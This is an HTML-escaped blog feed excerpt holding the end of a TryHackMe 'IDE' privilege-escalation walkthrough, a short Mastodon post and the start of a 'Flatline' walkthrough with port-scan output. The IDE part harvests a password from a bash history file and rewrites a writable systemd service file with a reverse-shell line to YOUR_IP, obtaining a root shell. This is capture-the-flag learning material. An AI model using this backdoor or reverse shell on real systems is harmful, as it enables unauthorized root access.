  Privesc
&lt;/h1&gt;

&lt;h2&gt;
  
  
  lse run
&lt;/h2&gt;

&lt;p&gt;Running &lt;code&gt;lse&lt;/code&gt; first. Note the very old Linux Kernel.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;
ser: www-data
     User ID: 33
    Password: none
        Home: /var/www
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
       &lt;span class="nb"&gt;umask&lt;/span&gt;: 0000

    Hostname: ide
       Linux: 4.15.0-147-generic
Distribution: Ubuntu 18.04.5 LTS
Architecture: x86_64

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; usr020 Are there other &lt;span class="nb"&gt;users &lt;/span&gt;&lt;span class="k"&gt;in &lt;/span&gt;administrative &lt;span class="nb"&gt;groups&lt;/span&gt;?................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
adm:x:4:syslog
&lt;span class="nb"&gt;sudo&lt;/span&gt;:x:27:drac
&lt;span class="nt"&gt;---&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; usr030 Other &lt;span class="nb"&gt;users &lt;/span&gt;with shell.......................................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
root:x:0:0:root:/root:/bin/bash
drac:x:1000:1000:drac:/home/drac:/bin/bash

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; sud050 Do we know &lt;span class="k"&gt;if &lt;/span&gt;any other &lt;span class="nb"&gt;users &lt;/span&gt;used &lt;span class="nb"&gt;sudo&lt;/span&gt;?........................ &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
drac

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; fst100 Useful binaries................................................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
/usr/bin/curl
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; sys050 Can root user log &lt;span class="k"&gt;in &lt;/span&gt;via SSH?................................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
PermitRootLogin &lt;span class="nb"&gt;yes&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; pro020 Processes running with root permissions......................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
START      PID     USER COMMAND
START      PID     USER COMMAND
08:24    28942     root &lt;span class="nb"&gt;sleep &lt;/span&gt;15                                                                                                                             
08:24    28939     root /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in &lt;/span&gt;0 1 2 3&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/www/html/config.php /var/www/html/data &amp;amp; &lt;span class="nb"&gt;sleep &lt;/span&gt;15&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
08:24    28938     root /usr/sbin/CRON &lt;span class="nt"&gt;-f&lt;/span&gt;
08:23     5438     root &lt;span class="nb"&gt;sleep &lt;/span&gt;15
08:23     2632     root &lt;span class="nb"&gt;sleep &lt;/span&gt;15
08:23     2630     root /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in &lt;/span&gt;0 1 2 3&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/www/html/config.php /var/www/html/data &amp;amp; &lt;span class="nb"&gt;sleep &lt;/span&gt;15&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="o"&gt;[!]&lt;/span&gt; cve-2021-4034 Checking &lt;span class="k"&gt;for &lt;/span&gt;PwnKit vulnerability........................ &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
Vulnerable! polkit version: 0.105-20ubuntu0.18.04.5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That process running as &lt;code&gt;root&lt;/code&gt;, where the &lt;code&gt;config.php&lt;/code&gt; is being deleted is interesting. The thing is, those files &lt;code&gt;config.php&lt;/code&gt; and &lt;code&gt;data&lt;/code&gt; don't exist. &lt;/p&gt;

&lt;h2&gt;
  
  
  linpeas run
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                          
OS: Linux version 4.15.0-147-generic &lt;span class="o"&gt;(&lt;/span&gt;buildd@lcy01-amd64-028&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;gcc version 7.5.0 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu 7.5.0-3ubuntu1~18.04&lt;span class="o"&gt;))&lt;/span&gt; &lt;span class="c"&gt;#151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021&lt;/span&gt;
User &amp;amp; Groups: &lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt;
Hostname: ide
Writable folder: /dev/shm

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034                                                                                                                                  

Potentially Vulnerable to CVE-2022-2588

════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                           
                ╚════════════════════════════════════════════════╝                                                                                           
╔══════════╣ Cleaned processes
╚ Check weird &amp;amp; unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes     

root       841  0.0  0.3  30028  3180 ?        Ss   07:11   0:00 /usr/sbin/cron &lt;span class="nt"&gt;-f&lt;/span&gt;
root      2628  0.0  0.3  57500  3200 ?        S    08:23   0:00  _ /usr/sbin/CRON &lt;span class="nt"&gt;-f&lt;/span&gt;
root      2630  0.0  0.0   4628   808 ?        Ss   08:23   0:00      _ /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in &lt;/span&gt;0 1 2 3&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/www/html/config.php /var/www/html/data &amp;amp; &lt;span class="nb"&gt;sleep &lt;/span&gt;15&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                              

╔══════════╣ Users with console
drac:x:1000:1000:drac:/home/drac:/bin/bash                                                                                                                   
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                              
/usr/bin/curl
/usr/bin/lxc
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
/usr/share/gcc-8                             

╔══════════╣ Searching passwords &lt;span class="k"&gt;in &lt;/span&gt;&lt;span class="nb"&gt;history &lt;/span&gt;files
mysql &lt;span class="nt"&gt;-u&lt;/span&gt; drac &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'CENSORED'&lt;/span&gt;       
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Well well we hit the jackpot. To confirm this, let's go check the history file ourselves.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@ide:/home/drac&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; .bash_history 
mysql &lt;span class="nt"&gt;-u&lt;/span&gt; drac &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'CENSORED'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Should have checked the history file first saved ourselves some time. Anyway, let's try ssh login with these creds.&lt;br&gt;
Success!!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;drac&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;drac&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;drac&lt;span class="o"&gt;)&lt;/span&gt;,24&lt;span class="o"&gt;(&lt;/span&gt;cdrom&lt;span class="o"&gt;)&lt;/span&gt;,27&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;,30&lt;span class="o"&gt;(&lt;/span&gt;dip&lt;span class="o"&gt;)&lt;/span&gt;,46&lt;span class="o"&gt;(&lt;/span&gt;plugdev&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No need for the reverse shell any more.&lt;/p&gt;

&lt;h3&gt;
  
  
  Privesc from drac to root
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; password &lt;span class="k"&gt;for &lt;/span&gt;drac: 
Matching Defaults entries &lt;span class="k"&gt;for &lt;/span&gt;drac on ide:
    env_reset, mail_badpass, &lt;span class="nv"&gt;secure_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/local/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/local/bin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/bin&lt;span class="se"&gt;\:&lt;/span&gt;/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/bin&lt;span class="se"&gt;\:&lt;/span&gt;/snap/bin

User drac may run the following commands on ide:
    &lt;span class="o"&gt;(&lt;/span&gt;ALL : ALL&lt;span class="o"&gt;)&lt;/span&gt; /usr/sbin/service vsftpd restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Interesting. This was confusing to look at first. &lt;/p&gt;

&lt;p&gt;But if you have installed software and administered a system before, you would recognize the command. &lt;/p&gt;

&lt;p&gt;&lt;code&gt;vsftpd&lt;/code&gt; has been configured to run as a &lt;em&gt;systemd&lt;/em&gt; service. The usual command to check the service status is &lt;code&gt;systemctl status vsftpd&lt;/code&gt;. Any guide to installing and configuring &lt;code&gt;vsftpd&lt;/code&gt; should have similar commands. Example -&amp;gt; &lt;a href="https://www.howtoforge.com/tutorial/install-and-configure-vsftpd-server-on-ubuntu-1804/"&gt;https://www.howtoforge.com/tutorial/install-and-configure-vsftpd-server-on-ubuntu-1804/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Anyway, let's check the service status&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
   Loaded: loaded &lt;span class="o"&gt;(&lt;/span&gt;/lib/systemd/system/vsftpd.service&lt;span class="p"&gt;;&lt;/span&gt; enabled&lt;span class="p"&gt;;&lt;/span&gt; vendor preset: enabled&lt;span class="o"&gt;)&lt;/span&gt;
   Active: active &lt;span class="o"&gt;(&lt;/span&gt;running&lt;span class="o"&gt;)&lt;/span&gt; since Tue 2022-11-08 09:28:50 UTC&lt;span class="p"&gt;;&lt;/span&gt; 27min ago
  Process: 1278 &lt;span class="nv"&gt;ExecStartPre&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/bin/mkdir &lt;span class="nt"&gt;-p&lt;/span&gt; /var/run/vsftpd/empty &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;code&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;exited, &lt;span class="nv"&gt;status&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0/SUCCESS&lt;span class="o"&gt;)&lt;/span&gt;
 Main PID: 1289 &lt;span class="o"&gt;(&lt;/span&gt;vsftpd&lt;span class="o"&gt;)&lt;/span&gt;
    Tasks: 1 &lt;span class="o"&gt;(&lt;/span&gt;limit: 1103&lt;span class="o"&gt;)&lt;/span&gt;
   CGroup: /system.slice/vsftpd.service
           └─1289 /usr/sbin/vsftpd /etc/vsftpd.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can not only check the &lt;code&gt;status&lt;/code&gt; but also stop, start and restart the service, with the right permissions.&lt;/p&gt;

&lt;p&gt;The file of interest to us here is &lt;code&gt;/lib/systemd/system/vsftpd.service&lt;/code&gt;. Contents of said file as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's see if we have permissions to modify this file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt; /lib/systemd/system/

&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 root drac  248 Aug  4  2021 vsftpd.service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Yes we do :)&lt;/p&gt;

&lt;p&gt;Let's modify the &lt;em&gt;ExecStart&lt;/em&gt; attribute in the config file, to create a TCP reverse shell to send us a connection whenever the service is restarted.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ExecStart=/bin/bash -c "bash -i &amp;gt;&amp;amp; /dev/tcp/YOUR_IP/443 0&amp;gt;&amp;amp;1 ; /usr/sbin/vsftpd /etc/vsftpd.conf"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You will need to run &lt;code&gt;systemctl daemon-reload&lt;/code&gt; after modifying the file to reload the config. Source: &lt;a href="https://www.shellhacks.com/systemd-service-file-example/"&gt;https://www.shellhacks.com/systemd-service-file-example/&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cp&lt;/span&gt; /lib/systemd/system/vsftpd.service vsftpd.service.bak
drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;vim /lib/systemd/system/vsftpd.service 
drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;systemctl daemon-reload
&lt;span class="o"&gt;====&lt;/span&gt; AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon &lt;span class="o"&gt;===&lt;/span&gt;
Authentication is required to reload the systemd state.                                                                                                      
Authenticating as: drac
Password: 
&lt;span class="o"&gt;====&lt;/span&gt; AUTHENTICATION COMPLETE &lt;span class="o"&gt;===&lt;/span&gt;
drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;systemctl status vsftpd.service                                                                                               
● vsftpd.service - vsftpd FTP server
   Loaded: loaded &lt;span class="o"&gt;(&lt;/span&gt;/lib/systemd/system/vsftpd.service&lt;span class="p"&gt;;&lt;/span&gt; enabled&lt;span class="p"&gt;;&lt;/span&gt; vendor preset: enabled&lt;span class="o"&gt;)&lt;/span&gt;
   Active: active &lt;span class="o"&gt;(&lt;/span&gt;running&lt;span class="o"&gt;)&lt;/span&gt; since Tue 2022-11-08 10:09:52 UTC&lt;span class="p"&gt;;&lt;/span&gt; 8min ago
 Main PID: 30361 &lt;span class="o"&gt;(&lt;/span&gt;vsftpd&lt;span class="o"&gt;)&lt;/span&gt;
    Tasks: 1 &lt;span class="o"&gt;(&lt;/span&gt;limit: 1103&lt;span class="o"&gt;)&lt;/span&gt;
   CGroup: /system.slice/vsftpd.service
           └─30361 /usr/sbin/vsftpd /etc/vsftpd.conf

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Its good to check the service status again, to ensure that our modification of the &lt;code&gt;vsftpd.service&lt;/code&gt; file did not result in any errors. Otherwise we would see a "Loaded: error"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NOTE:&lt;/strong&gt; Initially I did not add the &lt;code&gt;/bin/bash -c&lt;/code&gt; part to the &lt;em&gt;ExecStart&lt;/em&gt; string. Its only after getting errors and asking for a hint on the THM Discord that I figured out that it had to be done this way.&lt;/p&gt;

&lt;p&gt;Now, the moment of truth.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;drac@ide:/dev/shm&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; /usr/sbin/service vsftpd restart

&lt;span class="nt"&gt;---&lt;/span&gt;
└─&lt;span class="nv"&gt;$ &lt;/span&gt;ncat &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 443 
Ncat: Version 7.93 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org/ncat &lt;span class="o"&gt;)&lt;/span&gt;
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:56246.
bash: cannot &lt;span class="nb"&gt;set &lt;/span&gt;terminal process group &lt;span class="o"&gt;(&lt;/span&gt;31614&lt;span class="o"&gt;)&lt;/span&gt;: Inappropriate ioctl &lt;span class="k"&gt;for &lt;/span&gt;device
bash: no job control &lt;span class="k"&gt;in &lt;/span&gt;this shell
root@ide:/# &lt;span class="nb"&gt;id
id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt;
root@ide:/# 

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;DONE!! Have a great day!!&lt;/p&gt;

</description>
      <category>security</category>
      <category>beginners</category>
      <category>tryhackme</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Mastodon Verification Post</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Mon, 07 Nov 2022 07:19:35 +0000</pubDate>
      <link>https://dev.to/wandering-geek/mastodon-verification-post-2ci5</link>
      <guid>https://dev.to/wandering-geek/mastodon-verification-post-2ci5</guid>
      <description>&lt;p&gt;You can find my profile here =&amp;gt; &lt;a rel="me" href="https://mas.to/@wandering_geek"&gt;Mastodon&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Have a great day!&lt;/p&gt;

</description>
      <category>security</category>
      <category>mastodon</category>
      <category>infosec</category>
    </item>
    <item>
      <title>TryHackMe Flatline Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sun, 06 Nov 2022 13:19:35 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-flatline-walkthrough-27kf</link>
      <guid>https://dev.to/wandering-geek/tryhackme-flatline-walkthrough-27kf</guid>
      <description>&lt;p&gt;TryHackMe page for this machine =&amp;gt; &lt;a href="https://tryhackme.com/room/flatline"&gt;https://tryhackme.com/room/flatline&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.&lt;/p&gt;

&lt;h1&gt;
  
  
  Enum
&lt;/h1&gt;

&lt;h2&gt;
  
  
  rustscan nmap
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rustscan &lt;span class="nt"&gt;-a&lt;/span&gt; 10.10.98.113 &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-Pn&lt;/span&gt;

Open 10.10.98.113:3389
Open 10.10.98.113:8021

PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: &lt;span class="nv"&gt;commonName&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;WIN-EOM4PK0578N
| Issuer: &lt;span class="nv"&gt;commonName&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;WIN-EOM4PK0578N
| Public Key &lt;span class="nb"&gt;type&lt;/span&gt;: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after:  2023-05-07T09:12:21
| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
| &lt;span class="nt"&gt;-----BEGIN&lt;/span&gt; CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw
| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU
| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba
| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN
| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r
| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB
| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy
| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe
| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy
| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg
| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt
| pVkvw++/yMtWLoiiT+RCa2abEwEcPw&lt;span class="o"&gt;==&lt;/span&gt;
|_-----END CERTIFICATE-----
|_ssl-date: 2022-11-06T09:40:13+00:00&lt;span class="p"&gt;;&lt;/span&gt; 0s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: The machine keeps blocking ping probes. So use the nmap&lt;code&gt;-Pn&lt;/code&gt; flag when enumerating the machine!. &lt;/p&gt;

&lt;h2&gt;
  
  
  Port 3389 Enumeration
&lt;/h2&gt;

&lt;p&gt;Let's use some nmap scripts to enumerate the port some more.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;--script&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"rdp-*"&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 3389 flatline.thm &lt;span class="nt"&gt;-vv&lt;/span&gt; &lt;span class="nt"&gt;-Pn&lt;/span&gt;

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption: 
|   Security layer
|     CredSSP &lt;span class="o"&gt;(&lt;/span&gt;NLA&lt;span class="o"&gt;)&lt;/span&gt;: SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Port 8021 Enumeration
&lt;/h2&gt;

&lt;p&gt;I wanted to see what in the world FreeSWITCH is. From Wikipedia &lt;a href="https://en.wikipedia.org/wiki/FreeSWITCH"&gt;https://en.wikipedia.org/wiki/FreeSWITCH&lt;/a&gt;&lt;/p&gt;

